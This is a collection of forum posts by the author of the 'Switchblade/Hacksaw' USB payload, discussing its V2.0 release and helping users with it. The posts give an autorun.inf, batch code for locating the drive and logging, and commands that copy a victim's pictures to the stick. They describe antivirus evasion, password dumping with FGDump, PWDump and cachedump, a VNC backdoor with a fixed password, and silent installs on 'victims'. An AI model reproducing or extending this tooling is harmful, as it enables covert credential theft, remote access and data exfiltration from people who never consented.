GonZor

Sounds Like a good Idea, I may incorporate this into the next release depending on the feedback.

Finally out of beta: The long awaited V2.0 is now out of beta, sorry for the delay. Whats New: [li]Restructured the payload and rewritten half the code (reduced size)[/li] [li]Fixed VNC (confirmed working - new password is "easy")[/li] [li]Added the option to use either FGDump or PWDump (or both)[/li] [li]Rewritten the search function in VBS, hope fully fixed the "no disk error"[/li] [li]Changed the way the files are named, now named as - "%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%][/li] [li]Updated several parts so they are now undetected by most AV, to the best of my knowledge most AV's will only detect sbs.exe (part of the Hacksaw)[/li] * Please note for VNC to work you must have the correct ports forwarded on the "vicitims" router and firewall and such... I cant think of any other updates, Though I may have forgotten some. Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below... [li]1. Extract the ISO to the root of your flash drive.[/li] [li]2. Edit the AUTORUN.INF[/li] [li]3. Run SBConfig from your flash drive.[/li] * Please note the U3 menu system will not function on a non U3 drive but the payload will work fine (dont enable the U3 menu in SBConfig and you will be fine) *If you don't Know how to make your own autorun.inf, use the following code [autorun] action=Enable USB Flash Drive open=wscript go.vbs As usual any feedback is welcome, please let me know if you are still encountering the no disk error. I have re written the search function in vbs and this should get rid of the problem but I may be wrong and have no way of testing. Thanks and once again sorry about the delays. EDIT: As usual Linky In my Sig

Have you tried truecrypt?

I'm glad I can help, I'm surprised what I write actually makes sense to someone other than me. ------------------- If you open up a cmd and type "set" this will display a list of variables set on yopur machine, a lot of them will be windows variables, but some may be specific to your machine. The windows variables are the ones that become useful when doing something like this. After you take a quick look at this list you will notice two things wrong with the following line. file.exe /A:C "%homepath%%username%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P Firstly I gave you the wrong variable :-( The %homepath% variable expands to Documents and Settings%username% you will notice that this doesn't have a drive letter so it will only work if run from the partition where windows is installed. If we were to use the %homepath% variable we would need to use the %homedrive% variable before it, like so %homedrive%%homepath%. When expanded this would look something like this C:Documents and Settings%username%, when look at the variable list you may have noticed the %userprofile% variable which would expand to the same as %homedrive%%homepath%, so we should have been using the %userprofile% variable, sorry about that. Secondly, I'm sure you have already figured this one out after reading that, the %homepath% variable (like the %userprofile% variable) expands to Documents and Settings%username% therefore when used like you have "%homepath%%username%" it will expand to Documents and Settings%username%%username% and as you can see wouldn't work. The solution, replace the %homepath% variable with the %userprofile% variable and take out the %username% variable. Each line should now look something like this. file.exe /A:C "%userprofile%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P My suggestion is to use SciTE (Scintilla Text Editor), It has syntax highlighting and also has a window to view the output of the code (that does not disappear). If you want a screen shot to explain what I mean I will upload one later, but for now I'm off to wendys :P

----------------------------- Ill apologise now to all those people who I have not had time to answer your questions, I have been really busy recently. I will try to release V2.0 tomorrow if time permits. If I have missed your question I'm sorry and please pm me, you may not be the only person who wants to know. ----------------------------- This has been annoying me quite a bit, from what we can tell the error is caused by having a card reader. I don't have a card reader so I have never experienced this error first hand and there have been several parts of the story that vary for each person so it is very difficult to figure out EXACTLY what is causing this error. It shouldn't have anything to do with netpass since it happens when it is disabled (unless you are saying netpass runs even when it is meant to be disabled). The HakSaw should actually work now without having to wait until the next time you log on, let me know if it isn't because it works for me so I will have to test that. No problem, just giving back what I can. I feel so stupid, This is why we should learn to read properly... [me=GonZor]slaps self[/me] There is no "%Documents and Settings%" variable, assuming your <source> now looks like this "C:Documents and Settings%username%My Documents*.jpg" The "%homepath%" variable will expand to what you want. hence the <source> could be rewritten as this which is better in case they have windows installed on another partition. "%homepath%My Documents*.jpg" Unfortunately some of the tools are detected by certain AV, I was unaware of trend micro detecting fgdump and cachedump. Its odd that it allowed those tool to dump the information, you should look at your AV settings and change them to deny access for these programs. ----------------------------- Are you Mark Frederickson? If so please pm me asap. -----------------------------

-- Received demonoid invite from Cosmo many thanks. Once I have some invites I will share

Its a command line tool, it doesn't have a gui. read the parameter in the first post...

Easiest way to silently install something is to make a msi

Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually. :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( FOR %variable IN (set) DO <command> %variable specifies a single letter variable (my chosen variable %%i) (set) specifies what the variable will be each time (in this case the alphabet) <command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability) :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC IF EXIST %%i:SystemSRCdrv.dat ( The first command for each variable, IF EXIST <file> <command> <file> specifies the file to search for (in this case we are searching for the file SystemSRCdrv.dat but this can be changed to any file) <command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier) SET fd=%%i:SystemSRC This is the command to be completed once the file is found to exist, SET <variable>=<string> <variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%) <string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path SystemSRC) ) ) These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command. This could be written as one line but for readability I use the brackets. I hope that made sense but time now for some sleep :shock:

NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (eg mailpv.exe)

Depending on whether the user has saved the password this COULD be retrieved through either lsa secrets, IE password or Firefox password. As far as I know there is no special way that a myspace password is saved, maybe myspace IM saves it somewhere?? I don't know I've never used it.

What were you thinking of installing?

To be honest I have never used file.exe so I am unfamiliar with how its used but looking at your code, I am going to assume the last three lines should look like this: file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "%fd%Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "%fd%Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "%fd%Documents%computername%Pictures" /I /P assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. the problem was you were saying the destination was on the CD partition (which you obviously cant write to a CDFS partition).

Personally I use both, the main reason as pointed out by oligarchy314: Although when you have a number of apps organization is a must and pstart is better for that.

In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep) SET include="G:SRCInclude IF EXIST %include%0.dat" When the second line is expanded it will look like this "G:SRCInclude0.dat" Note the " on either end, If I were to enclose each in " like so SET include="G:SRCInclude" IF EXIST "%include%0.dat" When the second line is expanded it will look like this, and fail ""G:SRCInclude"0.dat" To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up. Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep. Id love to take a look at the tweaks you've made, as well as the executable. What language?

By deploy do you mean distribute (as in the way the switchblade/hacksaw has been amongst the community) or use maliciously (using the switchblade/hacksaw in an unauthorized situation)

You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload. :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( IF EXIST %%i:NUL.EXT ( :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC IF EXIST %%i:SystemSRCdrv.dat ( SET fd=%%i:System ) ) ) :: CREATE LOG DIRECTORY IF NOT EXIST %fd%Logs%computername% ( MD %fd%Logs%computername% ) :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" &gt; "%fd%SRC###" SET /p count=&lt;"%fd%SRC###" :: SET LOG PATH SET log="%fd%Logs%computername%%computername%-[%count%].log" Create a file on your flash partition SystemSRCdrv.dat. Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:SystemLogs%computername%%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder.

True crypt isnt the be-all end-all solution, For the reasons specified below... A lot of the tools used in the payload (specifically the ones that get detected by AV) need an admin account to work, I would create a combination of true crypt and rar.

As long as I'm not a penguin its ok by me :P Just remember /? is your friend, some of the explanations are very basic but most of them are quite useful

You were missing the quotes from around your destination, it should have read copy "H:WIPCMDVirtuMem.exe" "C:Documents and SettingsAll UsersStart MenuProgramsStartup" /y Notice the quotes around the source and destination pats, didn't need them around the source because there are no spaces but I do it anyway, I also added a /y switch to copy the file even if it exists (just to make sure its your file not a dummy file).

Which part? reading through the thread there is a lot of information here.

The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.

first of all check out my payload, take a look at SRCgo.bat in the ISO. Have you considered how you are going to make this customizable? Take a look at how my payload works because you wont be able to comment out parts of the payload you don't want on a CDFS partition. If you need any help just ask. If you want an explanation of any of my payload just ask I haven't commented go.bat very well

I remember a while back people were complaining about the karma because we couldn't tell who gave who karma and why... I don't know if you ever found a suitable mod but when i was looking for mods for my forums I found this http://custom.simplemachines.org/mods/index.php?mod=192 I've installed it and it seems to work really well, You can allow as much or as little information as u like about the karma given.

That was my first opinion but it is much more entertaining when your sleep deprived, although everything is entertaining when your sleep deprived.